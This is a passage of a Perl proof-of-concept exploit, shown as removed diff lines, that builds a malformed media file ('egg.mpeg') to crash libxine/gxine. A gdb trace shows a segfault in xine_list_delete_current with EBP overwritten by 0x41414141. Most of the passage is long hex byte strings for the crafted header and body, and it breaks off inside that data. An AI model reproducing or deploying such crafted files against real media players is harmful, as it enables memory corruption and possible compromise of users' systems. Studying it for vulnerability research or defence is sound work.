vulnerability / PoC -# -# Federico L. Bossi Bonin -# fbossi[at]netcomm.com.ar -#################################################################### - - -# (gdb) run /tmp/egg.mpeg -# Starting program: /usr/bin/gxine /tmp/egg.mpeg -# Program received signal SIGSEGV, Segmentation fault. -# [Switching to Thread -1276580944 (LWP 30688)] -# 0xb7edee9a in xine_list_delete_current () from /usr/lib/libxine.so.1 -# (gdb) x/x $ebp -# 0x8e2cbd4: 0x41414141 -# (gdb) - -my $EGGFILE="egg.mpeg"; -my $len=2024; - -my $header= -"\x30\x26\xB2\x75\x8E\x66\xCF\x11\xA6\xD9\x00\xAA\x00\x62\xCE\x6C\x2E\xA9\xCF\x11\x8E\xE3\x00\xC0". -"\x0C\x20\x53\x65\x2E\x00\x00\x00\x00\x00\x00\x00\x11\xD2\xD3\xAB\xBA\xA9\xCF\x11\x8E\xE6\x00\xC0". -"\x0C\x20\x53\x65\x06\x00\x00\x00\x00\x00\x91\x07\xDC\xB7\xB7\xA9\xCF\x11\x8E\xE6\x00\xC0\x0C\x20". -"\x53\x65\x72\x00\x00\x00\x00\x00\x00\x00\x40\x9E\x69\xF8\x4D\x5B\xCF\x11\xA8\xFD\x00\x80\x5F\x5C". -"\x44\x2B\x50\xCD\xC3\xBF\x8F\x61\xCF\x11\x8B\xB2\x00\xAA\x00\xB4\xE2\x20\x00\x00\x00\x00\x00\x00". -"\x00\x00\x1C\x00\x00\x00\x08\x00\x00\x00\x01\x00\x40\x34\x7C\x00\x61\x01\x01\x00\x80\x3E\x00\x00". -"\xD0\x07\x00\x00\x80\x02\x10\x00\x0A\x00\x00\x22\x00\x00\x0E\x00\x80\x07\x00\x00\x01\x80\x02\x80". -"\x02\x01\x00\x00\x91\x07\xDC\xB7\xB7\xA9\xCF\x11\x8E\xE6\x00\xC0\x0C\x20\x53\x65\x81\x00\x00\x00". -"\x00\x00\x00\x00\xC0\xEF\x19\xBC\x4D\x5B\xCF\x11\xA8\xFD\x00\x80\x5F\x5C\x44\x2B\x00\x57\xFB\x20". -"\x55\x5B\xCF\x11\xA8\xFD\x00\x80\x5F\x5C\x44\x2B\x00\x00\x00\x00\x00\x00\x00\x00\x33\x00\x00\x00". -"\x00\x00\x00\x00\x02\x00\x40\x34\x7C\x00\x40\x01\x00\x00\xF0\x00\x00\x00\x02\x28\x00\x28\x00\x00". -"\x00\x40\x01\x00\x00\xF0\x00\x00\x00\x01\x00\x18\x00\x57\x4D\x56\x31\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x01\xCD"; - - -my $end= -"\x24\x84\x21\x00\x06\x06\x94\xA4\xB4\x92\xF5\xA7\x55\x54\x7E\xB6\xB3\x3A\xE9\x65\xA7\xEE\xDE\x9B". -"\x7B\xE4\x25\x34\xA1\x08\x13\x29\x21\xB4\x54\x4D\x0F\xA0\xA1\x3C\x74\x83\x0D\x1A\x32\x36\xAB\xC6". -"\x91\xD5\xD0\x88\xC6\x62\x1E\x71\x65\x2F\xDC\x44\xAE\x0B\x78\x74\x14\xD3\x84\x9F\xCE\x80\x80\xA2". -"\x52\x94\x41\xA8\x84\x3B\x09\x09\x44\xA2\x1B\xD4\xA7\x1B\xC7\x52\xDF\x00\x83\x23\x19\x88\xF6\xA5". -"\x09\x9A\x9C\x78\x6F\xA9\x7E\x9A\x52\x2A\x8D\x12\xD0\x46\x88\x68\x54\x24\xB2\x53\x51\x14\x09\x10". -"\x11\xB2\x60\xED\x83\x30\xAA\x27\xA6\xC4\x32\x37\x20\x06\xB4\x4A\xB2\xD5\x40\x2C\x88\xC4\x0E\x63". -"\x15\x59\x19\x6C\x30\xBC\x75\xFE\x1E\x50\x10\x43\x63\x21\x1E\xFD\x44\x31\xF0\xA1\x69\xF3\xB2\xFE". -"\x60\x01\x24\x58\x54\x1A\x81\x44\xD5\x4C\x22\x94\xC4\x00\x6A\x69\x70\xE5\xA9\x63\x4C\x5D\xA6\xCB". -"\x2A\xB0\x1E\xEC\x36\xE2\x03\x4E\x98\xC0\x08\xBB\x76\xB5\xD0\x5E\x1E\x3A\xBE\xFA\x02\x81\x05\x35". -"\x31\x11\xED\x5A\x94\x19\x5B\x41\x42\x00\x7C\x52\x52\x02\x13\x74\x6C\x2A\xC2\xC0\x21\x92\x50\x29". -"\x82\x96\x61\x9D\x4C\x88\xD5\xC6\x5A\xA8\xB4\x11\x07\x71\x37\xB4\x91\x62\xAD\x81\x2C\x56\x4F\xBB". -"\x4D\x75\x73\x1E\x3A\xFE\xFF\x00\x81\x85\x35\x32\x11\xEF\xD4\x83\x91\xA8\xAA\x87\xE6\x9A\x68\x29". -"\x29\xB8\x74\x64\x41\xD1\x46\x93\x2B\x0A\xA9\x04\x1A\xA0\x12\x4C\xAF\x67\x4A\x99\x00\x6F\xB6\x33". -"\x62\x40\x32\x35\x01\xAA\xEC\x02\xD6\x75\x2E\x4E\x6A\xAE\x71\x95\x78\xE9\xFB\xDC\x00\x00\x02\x22". -"\x98\x90\xF6\x34\x99\x8A\x50\x00\x7E\xED\x8B\xF0\xEA\x22\x20\x96\x36\x40\x6C\x02\x18\x0B\x0B\xE2". -"\x83\x25\x2D\x29\x32\x22\x61\x59\x8B\x32\x25\xCF\x52\x24\x96\xF3\x64\xE8\x19\x3B\x20\x41\x52\x75". -"\x5B\x4F\x93\x85\xE3\xAB\xEF\x98\x30\x20\xA8\xC6\x42\x3D\x7F\xB0\x82\xD1\x44\x53\xC4\xF8\x50\xB1". -"\x12\x2A\x4C\x32\x01\x56\xAC\x43\x24\x10\x69\x4A\x09\x13\x15\x68\x86\xCD\xFA\x0D\xC7\x2C\x02\xFD". -"\x2B\x24\x86\x2F\x86\x96\x09\xD3\x44\xCA\x85\x2C\x0C\x10\xC2\xDB\x5A\xE9\x8F\x1D\x3F\x68\x08\x08". -"\x18\x44\x53\x12\x1E\xF6\x62\x03\xF4\xD0\x92\x38\xA8\x09\x4A\x5A\x9D\xC4\x2A\xC8\xA2\x62\x20\x86". -"\x48\x4D\x49\x24\x26\xAA\x02\x0F\x47\x85\x30\x18\xE4\x5B\xA8\x83\x07\x7A\x20\xED\xBB\x90\xC2\xEB". -"\xE7\x0E\xE6\xD7\x83\x9F\x6F\x1D\x4F\x84\x85\x05\x45\x31\x21\xEF\x55\x41\xA5\xD9\xA2\x69\xA5\xF2". -"\x69\x0E\xA9\x2A\x89\x50\x40\x64\x40\xA8\x11\x86\x94\xBB\x02\xAD\x44\x48\x06\x41\xFB\x78\x20\x29". -"\x02\x37\xC2\xD3\x68\x62\x74\x5A\x22\x5A\x1B\xB6\x29\x5F\x9C\x08\xE9\xE0\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x82\x01\x00\x00\x00\x00\x08\xDA\x24\x00\x00\x1C". -"\x0C\x00\x00\x5B\x02\x13\x77\x85\x0B\xAA\x81\xE6\x94\x6E\x4E\x58\x82\x30\x25\xD2\x0F\xA5\xFC\xE0". -"\x80\x48\x7A\xC5\x11\x6E\x0E\x31\xF8\x10\x5F\x37\x14\x53\x3E\x9B\xE1\xBA\xAB\x81\xF0\xF6\x21\xE2". -"\x47\x5E\x7F\xFE\x12\x41\x46\x78\x7D\x3B\x44\x42\x2E\xC7\x98\xF1\x67\xF2\x7E\x86\x88\x07\xF7\x21". -"\x2D\x35\x88\x20\x9B\x82\x36\x0D\x90\xB8\xA6\x33\x18\xA4\x86\x1B\x2E\x43\x40\x61\xF8\x73\x90\xCC". -"\xF9\xC6\xFF\x63\x05\x96\xE5\x45\xFB\xB3\x40\xAD\xC5\x81\xCF\x67\x50\x70\x51\x2B\x9D\x9F\x55\xF0". -"\x2F\x24\x2A\xF0\xE8\xB2\x61\x29\x47\x69\x4A\x84\x2C\x7B\xAD\xD4\xC3\x06\x96\xD5\x03\xD0\xC1\xF4". -"\x4E\x65\x64\x0A\xE8\x14\x32\x40\x42\xE1\x11\x08\x40\x29\x1D\x97\xC8\x33\x1B\xCC\x20\x5D\x6D\x85". -"\x82\xAF\x34\x2F\x43\xC3\x58\x8D\x9F\x28\x91\x51\x3C\x3A\xAC\x63\x7C\xFE\x2F\xCE\xB6\xDE\x65\xC5". -"\xB1\x83\xD8\xC1\xEF\xFF\x15\x68\xF3\xD9\x24\xB9\x97\xF2\x72\xEE\x08\xCC\x7C\x47\x8A\xA5\xE5\xD9". -"\x78\xF6\x2E\x37\xF4\xEA\xB0\x55\xE1\xD5\x41\x55\x05\x54\x08\x48\xCC\x3A\x27\x10\x0A\x92\xF6\x44". -"\x64\x20\x75\x5E\x77\x57\x64\x37\x1A\x55\xEE\xB4\x83\x6F\x2D\x24\xB4\x69\xDD\x88\xCB\xED\x30\xA0". -"\x1E\xF2\x18\x01\x00\x90\x24\x80\x01\xE6\xD4\x64\x53\x6C\xC6\xF5\x8C\x4B\xBC\x90\x0B\xD3\x9A\xD5". -"\x6D\xD1\x28\xBE\x78\x77\x8A\x47\x57\x67\xB4\x77\x3D\xEF\xD5\x76\x5C\xD9\x9E\xD2\x42\x93\x8A\x42". -"\x69\xBD\x14\x16\x30\x40\x4F\xE8\xF2\x33\x90\x21\x34\xA9\xDD\x62\xBC\xCB\x9C\x7A\xCF\xE5\x47\x08". -"\xA4\xA4\xCD\xE6\x44\xC3\xBF\x11\x60\x25\x14\xC6\x48\xFA\xEC\x7F\x9F\x6A\x24\x11\x74\xAA\x32\xCB". -"\x29\x27\x75\x63\xB9\xC8\xF3\xDE\xE8\xFC\xBE\xE5\xE8\x1C\x11\x7F\xDB\xBC\xDB\x75\x4D\xDB\xC9\xDD". -"\x1D\xE9\xE2\x81\xE1\x82\x80\x00\x2C\xA7\x14\x80\x8A\x4D\xF0\x8E\x4A\xED\xA6\x19\xA7\x07\xAD\xCC". -"\x10\x94\xA1\xC0\xCD\xFC\xBD\x38\x7C\x83\x72\x26\xB6\xCB\xE1\xB8\x34\xB4\x1A\x5C\x3E\xAB\x25\xAF". -"\x8E\x0E\x0C\x89\xE7\x8B\x17\x0C\x9B\x27\x06\x40\x06\x2F\x37\x2A\xC1\x7F\x3E\xD5\xC0\x09\x8D\x9E". -"\x96\xED\x23\x08\xB3\x11\xDE\x7D\x60\xE2\xCA\xE5\x12\x28\x02\xF0\x5F\x23\x82\x3D\xB2\x3B\xEE\x81". -"\x63\x61\x85\xFE\x8D\x06\x50\xE1\xD8\x50\xE6\xAD\xC5\xD0\xC3\xE8\x02\x4F\xA5\xC9\x59\x51\xF3\xAF". -"\xB0\x89\xC8\x54\x59\x66\x24\x25\x65\x09\xEB\x75\x73\x74\x1D\x22\xAD\xA6\x06\xD5\x3F\x50\xCD\x7E". -"\xC0\xD7\xA2\x18\x0C\x71\x81\x8C\x25\x06\xCE\x57\x8D\x51\x80\x52\x4E\xDB\x66\x15\x13\xB2\x4C\x05". -"\x12\x35\xF6\xC9\xA9\x9F\xF6\x5C\xE2\xB4\xA1\x91\x49\x2D\xEC\x79\x25\x82\x5B\x68\x30\x13\x1A\x80". -"\xD2\x98\xC5\x91\xCC\xD2\xEB\xD4\x80\x56\x17\x0B\xB6\x18\x5C\xC3\xCC\x80\x09\x80\x03\x06\x73\xF2". -"\x6C\x20\x11\x23\x3A\x09\xB4\xA8\x82\x00\x00\x08\x5D\x02\x64\x00\x00\x00\x64\x00\x82\x01\x5B\x02". -"\x00\x00\x08\xDA\x24\x00\x00\x1C\x0C\x00\x00\x7A\x9A\x13\x14\x00\xCC\xC2\xC0\x10\x41\x10\x58\x2C". -"\xD0\x46\xF2\x4A\xFC\xEE\x68\xF1\x54\xC6\xF1\x89\x80\x27\xC6\x31\x60\x29\x71\x4E\x01\x9D\xDB\x57". -"\x31\xDA\xAF\xDB\x3A\x5F\x14\x0E\xA7\xC7\x53\xFB\x24\xDF\x60\xEB\xC3\xBA\xA4\x77\xC5\x2A\x62\x90". -"\x3D\x20\x04\x84\x62\xDF\xA7\xF5\xE9\x4D\x54\x15\x50\x55\x41\x55\x01\x55\x5D\x6D\x06\x98\x78\x51". -"\x18\x61\x96\x44\x25\x98\xE2\x34\xCC\x80\x08\x2F\xC8\x4A\x28\x67\x55\x08\xE1\xE6\x20\xEB\xDF\x93". -"\x12\x19\x32\xBF\x06\xC9\x93\x0C\x40\xB9\x1E\xF6\x24\xA7\x3A\x76\x72\xF4\x21\x3B\x18\xA7\x69\x41". -"\x37\x88\x51\x3E\x0B\x73\xAD\xE4\x67\x04\x4B\xB9\x97\x27\x6B\x5C\xF7\x74\x9A\x6E\xD1\x1B\x8A\x28". -"\x8E\xA5\x55\xBB\x23\x72\x65\xE5\xDC\x51\x6A\x7A\xA3\x1C\x50\xD1\x9C\x53\x1A\xE1\x80\xF8\x90\x24". -"\x7E\xC2\xC6\x60\x32\x0F\x21\x58\x9B\x47\xE9\x3D\x67\x59\xDA\x34\xC8\xEA\xE8\x25\x34\xEA\x67\x41". -"\x03\xA2\x30\x4E\x10\xA6\x89\xD7\x4F\xA4\xA8\x6E\x75\x1E\x27\x2A\xC2\xAA\x33\xA6\x5B\x37\x55\x6C". -"\x89\x68\x23\xB9\x00\x84\x17\xB1\xB5\x1B\x03\x49\x21\xB8\x32\xD0\xAC\x32\x92\x07\x5C\x22\x8C\x0C". -"\xDB\xB8\x83\xBB\x94\x90\x00\x82\x29\xF3\x32\x6F\x42\x74\x38\xEC\xF6\x48\xF0\x8E\xD1\x98\xBA\x20". -"\xA0\xD6\xBE\xEA\x39\x6C\x11\x0B\x4E\x94\x0E\x41\x94\x61\x28\xF1\x80\xCC\x1B\x82\x53\xDC\x79\x0B". -"\xC2\x79\x82\x25\x2E\xD4\x8E\x51\x8A\x8E\xEB\x4E\x94\x0B\x58\xDD\x39\xDE\x94\x5A\x4C\x8C\x25\x80". -"\x15\x25\x87\x05\x3F\xCA\x19\x23\x0E\x04\xAE\x4E\x1D\x16\x57\x2D\x89\x25\xA3\xB2\x3A\xB5\x6C\x38". -"\x53\x0B\xBA\x2A\xE0\xED\xF9\x4B\x84\x8A\xAC\x0B\x38\x98\xC5\x12\xC9\x99\xE9\x7D\x92\xC8\x05\x13". -"\xE4\x04\x30\xCE\x80\x1D\x03\x2F\x72\x36\xDA\xC8\xF5\x0A\x19\xD1\x45\x00\x1B\x10\x78\x28\xAA\xCA". -"\x43\xA3\xA1\xCD\x91\x79\x44\x60\x33\x00\x5E\x78\x70\x0E\x33\xDD\x68\x6B\x63\x93\x19\x21\x73\x52". -"\x9B\x6D\x02\xF5\x76\x94\xAD\x8E\xC2\xC8\xD0\x01\x39\xF0\x89\x90\x03\x90\xC4\x1B\x94\x88\xE0\xC3". -"\x46\x06\xD0\xCB\xD4\x08\xCB\x30\x38\xC2\xF3\x62\xD2\x68\x1A\x21\xED\x87\xE1\x82\x98\xE6\xC4\xC2". -"\xBE\x1D\x25\x6D\x75\x93\x37\x4A\xE9\x32\x80\xD2\xB8\x26\x28\xA2\x05\x62\x30\x86\x81\x0B\xBA\x05". -"\x8F\x07\x80\x3C\x00\x17\x04\x01\x50\xC0\x87\xF1\xEC\x20\x53\x5D\xAF\x36\x22\xBC\xC4\x42\xE3\xC3". -"\xA3\x7C\x10\x85\x00\x27\x58\x8F\x98\x40\x11\x9A\x83\x53\x7A\x02\x43\xB7\xEE\x2F\xAA\x33\x6C\x2F". -"\xC8\x09\x1B\x21\xCD\x6D\xCE\x14\x04\xF8\xAF\x67\x71\x12\x44\xA3\x92\xA7\x4A\x9A\xA7\x14\x7F\x99". -"\x22\x91\xD6\x5E\xDE\x88\xEA\x78\x07\x04\x46\x39\x2C\xA1\x99\xC5\x7C\xDB\x27\x26\x42\x3A\xC7\xA8". -"\x2A\xA0\xAA\x82\xAA\x0A\xA8\x0A\x77\x6A\xA7\x7E\x5E\xD9\xB2\x9D\x96\x08\x99\xCB\xC4\x08\x34\xC2". -"\x3D\xAD\x26\x04\xE9\xC0\x82\xF4\x00\x8E\xC8\xBE\xC3\x43\x76\x18\x04\x17\x9B\xB8\x57\xA0\xC9\x06". -"\x98\xE5\x05\x19\x9F\xF8\x44\x5B\x23\xD6\x8E\xDB\x73\xD5\xB7\x88\x22\x40\x61\x61\x0C\x01\x18\x16". -"\x67\xC0\x18\x4C\x96\xA8\x9F\x6A\xEE\xB4\x23\x6C\x60\x77\xCD\xAA\x37\x63\x7C\xFE\x9E\xB0\x1D\xC9". -"\x79\x2C\xDD\xFF\x95\x59\xF5\x2C\x67\x8B\xFF\x3D\x1A\xFF\x76\x2A\xEF\x00\xFF\xA5\xAF\x29\xE9\xCC". -"\xDA\x03\xDB\xB9\x40\x09\xA9\x41\x35\xB1\xC6\xB0\x05\x8C\x30\xF4\x05\xF8\xD0\xA4\x3A\xB9\x2C\x40". -"\x66\x86\x00\x50\xE4\xD1\x08\xB8\x2D\x8E\x26\x94\x2A\x68\x46\x4C\x86\xAC\x37\x1B\xA1\xD9\xC8\xCA". -"\x3E\xBD\x5D\x09\x06\xF5\xEB\xD0\xEC\xC3\x30\xB8\xAA\x8B\xD5\xB7\x9B\xCC\x68\x1C\xA3\xAD\xF7\x48". -"\x6B\x6D\x02\x44\xC8\x76\x77\x9D\xAC\x9F\x47\xC3\x61\x33\xDA\x53\x85\x10\x83\x1C\x28\x19\x86\x6B". -"\xC3\xCD\xC4\xE7\x83\x14\x02\x4B\x59\x85\xB1\x4D\xB6\x44\xE3\x5E\x02\x89\x94\x0E\x88\x8E\x3E\x70". -"\x02\x06\x28\xD9\xD5\x48\xF0\xDF\x37\xD8\x07\xE0\x39\x93\x3F\xE6\x87\xAE\x26\x33\x36\x85\x40\xF7". -"\xB7\x4F\xD7\x53\x35\xD4\xB5\x48\x9C\x5E\x35\x4C\xFC\xEE\xBB\x34\xB8\x21\xD2\xEE\x08\xEE\x28\xC8". -"\xE5\x04\x40\x87\xFF\xAD\xDE\x62\x7C\x94\x0E\x5F\xF9\x1D\x99\x64\xF1\x19\x62\x5A\xE2\x03\x4D\x1E". -"\xA5\xAC\x9D\x9F\x75\x33\xBF\x26\x83\x45\x86\xA3\x3F\x8E\xBA\x33\x08\xF8\x4B\xA7\x80\xDA\xCB\x70". -"\x0F\x08\xFE\xB1\x0E\xBA\xF0\xBF\xF5\x53\x1B\x1E\x87\x09\xCF\x89\x07\x4A\xAA\xC7\x5F\xC8\x66\x5E". -"\x8C\xF2\x9B\xEF\xFB\xFD\x6A\x93\xD3\x7C\x10\xC1\x48\xAD\xA1\x71\x18\x72\x09\xD4\x7F\xA1\x29\x1B". -"\xA9\x79\x68\x16\x2F\x5E\xCA\xCA\xA0\x1F\x65\xBC\x64\x9F\xF5\x69\xF9\xEB\x10\x92\x14\x02\xF4\xA5". -"\x0E\x22\x02\x83\x69\x1A\x87\x0C\x72\xB5\x60\x09\xD3\xA0\xD2\x3E\x14\x01\xF3\x9F\xCA\x87\xEA\x66". -"\x7E\x2A\x90\x7B\xDB\x24\xBF\x79\x48\xEC\x73\x94\x29\x25\xEF\x68\x36\xC8\x61\xCB\x0F\xA8\x17\x1C". -"\xE2\x3A\xD2\x23\xFF\x2D\x92\xF6\xC9\x71\x64\xE5\x8C\xAE\x4C\x52\x17\x1F\x20\x90\x53\xBB\x3A\x9C". -"\x23\xDB\x32\x6C\x32\x46\x26\xC8\x58\x81\x5B\x07\xD4\xAA\x27\x55\x22\x00\x7C\xD8\x4B\x9C\xBA\x3B". -"\x6C\x4F\x05\xA1\x0B\x20\x00\x6F\x1A\x85\xC2\x91\xA9\xFB\x59\x88\x6C\xFD\x28\xFB\x20\x88\xB0\x18". -"\x04\x0F\xC9\xD3\x9C\x70\xA3\x74\xC3\x96\x4B\x6A\xCA\x6B\x57\x36\x46\x24\xDD\xE4\xA3\xA1\x18\x77". -"\x97\x26\xE1\xAA\xE7\x67\x6F\xB9\xBC\x95\x4F\x37\xFA\x3A\xE5\x55\x3B\xAD\xB5\x9C\xA1\x91\x5A\xB4". -"\x82\xE0\x94\xEA\x32\x45\x30\x0D\x96\xE8\x29\x36\xCC\x4F\xF9\xDD\x26\x51\x9B\x4C\x86\x81\xD4\xF1". -"\x9A\x41\xDB\x08\x7D\xED\xDB\x08\xC4\xE6\x06\x8D\x30\x82\x32\x1B\xF8\x6D\xB1\xFD\x83\xC1\x32\x80". -"\x90\x22\x17\x25\xD9\xB1\xA9\xCD\x61\x34\xE7\x8B\x20\xC7\x19\x00\xFC\x53\xB9\xFF\xDD\xCD\x96\xF9". -"\x55\xC9\xC9\x96\xAB\xA5\xDA\x23\x0E\x87\xB2\x81\xDB\x47\x70\x32\x1A\x2D\x2C\x35\x50\xAA\xA1\xB4". -"\xA8\x82\x00\x00\x08\x5D\x02\xC8\x00\x00\x00\x64\x00\x82\x01\x47\x07\x00\x00\x08\xDA\x24\x00\x00". -"\x1C\x0C\x00\x00\xD5\x41\x55\x05\x54\x05\x70\x6C\x49\x94\x02\xD4\x52\xA2\x18\x89\x04\xD4\x02\xCF". -"\x10\x38\x16\x29\xCB\x41\x08\x43\xA5\xB0\x69\x31\x8C\x37\x39\xE4\x14\x3B\xB7\x04\x83\x68\x11\x81". -"\x63\x84\xA0\x06\x73\x76\x13\x22\xF1\x10\x15\x02\x15\x06\x8D\x13\x4D\x51\xAC\xC8\xE6\x18\x57\xBE". -"\x39\x3D\x36\xF6\xFE\xAD\xDB\xED\x47\x41\xCA\xA7\x7A\x6D\x0E\xD4\x8E\xA7\x28\x8A\xA4\xBE\xA6\xDB". -"\xEF\x41\xEF\x97\xCE\xF9\x4E\x0E\xCF\x15\xC8\x22\x63\x9F\x04\x14\x98\xC2\x0C\x23\xCC\x10\x29\xE3". -"\x85\x65\x72\x00\x6B\x56\xFD\x24\xE7\x2D\x02\x19\xD1\x33\x0D\xD1\xC8\x59\x80\xD8\x11\x74\xCC\xBD". -"\xB0\x4F\x84\xFE\xA4\x77\x62\x99\xDA\xC4\xA1\xA0\xA3\x08\x9C\x5F\x55\xF6\xC1\x11\x38\x1D\xF2\x98". -"\x04\x37\xDB\xCC\x65\xBD\x6A\x1E\xBD\x51\xF6\xF7\x77\x7A\xA6\x7D\xAD\x9E\xE2\x86\xF8\x23\xEF\x2C". -"\xBC\xE3\x8A\x12\x40\x4B\x5C\xC1\x39\x6C\xC7\x8D\x21\xA6\x3E\x05\xBE\x23\x76\x0A\xFA\x9A\x40\x27". -"\x44\x75\xE6\xA7\x88\x2F\xD3\x65\x4E\x03\xA2\x5C\x22\x45\xD1\x22\x8D\x0C\x18\xD1\x2C\xCD\x2B\x7A". -"\x64\xE4\x7F\x7C\xB2\x4E\x8E\xAE\x22\x94\x76\xD6\x8F\x66\x2D\x09\xF1\x54\x81\x9D\x42\xC2\x75\x2D". -"\xC4\x8A\x3E\x91\xE7\xE3\x94\x7E\xDD\xA1\x2F\x2D\x96\x11\x5D\x97\x0A\x48\x6D\xB5\xE6\x39\x69\x28". -"\x27\x95\x14\xAE\x9F\xFD\xB9\x38\x8A\x3A\xCA\x6C\x6B\x3A\x92\x15\x66\x70\xC3\x80\x60\x9C\xEA\xA5". -"\x91\x91\xCA\x59\x3A\x1F\x4A\xBD\xF6\x95\x52\x89\xC9\xDA\x4F\x9C\xAA\x08\x4A\x00\xE9\x78\xC8\xA6". -"\xAF\x98\x4D\x47\x34\x84\x8E\x02\x68\xA9\xF5\xF2\xC0\x3D\x9E\xE2\xA2\xD7\xE2\x09\x62\x4A\xB2\xF0". -"\x2D\x09\x12\x01\x0E\xCD\x09\xD5\xAE\x30\x6F\xD4\x74\x72\x0F\x20\x1C\x82\xA4\x92\x92\xC8\x93\xC0". -"\x62\xE4\x4F\xF9\xE8\x72\x10\xB3\x95\xCC\x33\xF0\xC8\x52\x46\xCA\xCF\x0C\xEB\xA0\xC1\x1B\xC7\x5B". -"\xD7\x68\xCF\x40\xCA\x99\x8A\x29\xD4\x27\x41\x39\x51\x1A\x00\xB7\xC2\x38\x52\xE5\x59\xAD\x8F\xF9". -"\xC4\x67\x9C\x18\x6C\xFD\x73\xC5\x05\x65\xC6\x5B\x1A\x44\x34\x7B\x44\x02\xFE\x61\x13\x92\x9C\x8C". -"\x0D\x0E\x7C\xFF\xA5\xF2\xBB\x65\x65\x14\xA3\x69\x51\x3E\x95\x42\xB9\x01\x46\xAB\x60\x16\xD8\x3D". -"\x85\x76\x23\x71\x44\xD9\xDD\x55\xA7\x52\x40\x03\x74\x39\x60\xEF\x20\x98\xE6\xF4\xAD\xA8\x5B\x33". -"\x61\x73\xCC\xFD\x0C\x12\x6C\x72\x90\x4A\x84\xE0\x40\x10\xB6\x60\xDF\xEE\x0C\x13\xA7\xAC\x45\x6E". -"\x14\x6F\xE2\xA7\x32\x2C\x84\x60\x4D\xCA\x4F\xAB\x57\xB0\x78\xA9\x4E\x32\x07\x6C\x2F\xC6\x6C\x9F". -"\xF6\x5C\x03\x16\xCB\x79\x87\xA7\x0B\xB9\x36\xF8\x7F\xA0\xA5\x53\xCD\x02\xA3\xBD\x4A\x07\x0F\x94". -"\xA9\x5E\xD4\x7D\x4D\x04\x61\x93\x53\x11\x43\x43\x3F\x73\x7A\x9E\x1C\x09\x67\xB0\x86\x75\xEE\xD0". -"\x58\x91\x31\x9F\x5E\xEA\x7C\xC3\xD1\x2C\xE0\x20\xC2\x38\x21\x80\xD7\x81\x2E\x7E\x13\xD2\x38\xC2". -"\x25\x13\x80\x49\x81\xF8\x7D\x9A\xAB\xF9\xC0\x3D\x55\x70\xB9\x5A\x8E\x27\x1D\xF8\x74\x07\x00\xE2". -"\x8E\x4B\x97\xBF\x93\xD9\x1E\xA8\x1F\xF5\x2F\x1D\x28\xD6\xED\x92\xD6\xFF\x37\xDB\x66\x31\x3F\x33". -"\xBF\xD2\x63\xF1\xC9\xD9\x28\x2A\xEA\xEB\x7E\xEE\x6B\x6A\x75\x0E\xC4\x27\xAF\x03\x6F\xE0\xFC\x50". -"\x95\x27\x6E\x11\xC7\x10\x64\x08\x53\xF2\xA8\x5D\x21\x8C\x82\x71\x90\xFC\x3D\x26\x21\x8A\x4E\x64". -"\x25\x0D\x89\x28\xCA\xF8\x58\xA5\xF8\x93\xCB\x6D\xDD\x11\x69\x64\xBB\x22\x84\xD1\x79\x26\xEB\xB2". -"\xD5\x62\x5B\x7E\x2F\x93\x99\xFF\x29\xF5\x57\x1A\xBE\x11\x87\xB2\x67\x26\x4F\x49\x9D\xEE\x58\xFA". -"\x91\xD9\x4E\x00\xBA\x1F\x22\xB9\x98\x27\xCB\xA0\x30\x50\xA0\xB0\x82\xD4\x40\xB9\x3F\xC7\xAA\xA8". -"\xBD\x54\x15\x50\x2C\x40\x2E\x55\x43\x78\xD9\xF0\x89\x1F\x48\x5F\x70\x5D\xA4\x12\x22\x74\x8F\xA9". -"\x6A\x4F\x20\x00\x1A\xD5\x6B\xC0\xC9\x93\x2D\x97\xCE\x19\x5A\x46\x94\xAF\x6E\x69\xE9\x3D\x0E\x3F". -"\x8E\x96\x8D\x4E\xCA\x00\x78\x18\x47\xBB\x66\x54\x00\x00\xEE\x07\xB4\xC2\x6D\x75\x07\xB1\xDB\xFB". -"\xDA\xFF\xCA\x70\x7B\xE5\x28\xFA\xB3\x57\x1A\x88\x1D\x2A\xBE\xA4\x14\x9F\xF5\xDC\xF2\x8A\xA3\xF4". -"\x45\x07\x5B\xEA\xE4\x98\xBD\x18\x14\x90\xDD\x6E\x7D\x02\xD8\x90\x92\xC4\x24\x8A\x00\x67\x08\xAC". -"\xCE\xEE\x88\xB7\x04\xED\x74\x59\xF8\xE2\x96\xB6\x1F\x49\x00\x99\x9B\x04\x06\x30\x19\xD6\x84\xF7". -"\x21\x12\xC5\xC4\xD1\xC1\xEF\x7F\x8A\x7D\x99\x04\x49\xA2\x35\x6E\xFE\xD6\xEE\x6F\xEB\x31\xB3\xF8". -"\x65\xFF\xD5\x28\x55\x3F\xB2\xFA\xD0\x37\x53\xCD\xF4\x63\x15\xC5\x2C\xFC\x1C\x94\xA5\x21\x3C\x90". -"\x43\x0A\x46\xCD\xE1\x07\x5B\x39\x6A\xD0\x2D\x04\x9E\x8F\x31\xCA\xD8\xA6\x3D\x21\x0D\x52\x12\x5A". -"\x9C\xC9\x15\x13\x98\x30\x12\xC0\x77\x42\x0D\x10\x6C\x44\xD8\xD0\xB5\x7C\x3F\x53\x85\xCA\x27\xA8". -"\x3A\xEA\x77\xF2\x01\x65\x4A\x04\x7C\xEE\xDF\xE4\x35\x00\xA2\x54\xA3\xE3\xD8\xAE\xAD\xE8\xDE\xA0". -"\xEA\x3A\xA9\x25\x38\x52\xAC\xE0\x9C\xE0\xE0\x85\x13\xAC\x07\x36\x4B\xB0\x03\x8E\x54\x70\x82\x47". -"\x6F\x23\x84\xAD\x94\xAC\x6C\x8A\xF2\xF6\xA7\x9B\x94\xAF\xA8\x7E\xF9\x53\xFF\xFB\x6F\x95\x0F\xA8". -"\x3A\x7C\xCD\x2B\xCD\x5F\xCE\x3F\x6E\x2C\xD9\xCF\x12\x92\xBD\x11\x72\xBA\x6B\x10\x4B\x56\xA6\x8B". -"\x9C\x2C\x52\x4A\x24\x27\xC1\x08\xB3\x07\x27\x2B\x8A\xC9\xF3\xC7\xD3\x7B\x74\xD6\x31\xC0\x8A\x14". -"\x54\xE3\x3E\x30\x0A\x20\x4F\xC8\x8A\x18\x3E\xCA\x58\xA7\x66\x11\xEE\x01\x82\x88\x15\xBE\x94\x53". -"\xED\x77\xC4\x97\x1E\x55\x8E\x06\x21\x1D\xE4\x14\xA7\x28\xAC\xBA\xB8\xA6\x3F\x64\xF6\xC4\xB9\xC8". -"\x01\x08\xC3\xBC\x51\x4B\x7F\x84\x25\x2B\xA4\x2B\xA7\x5D\xAF\xA4\x72\x67\x06\x29\xCF\x6F\xA0\x63". 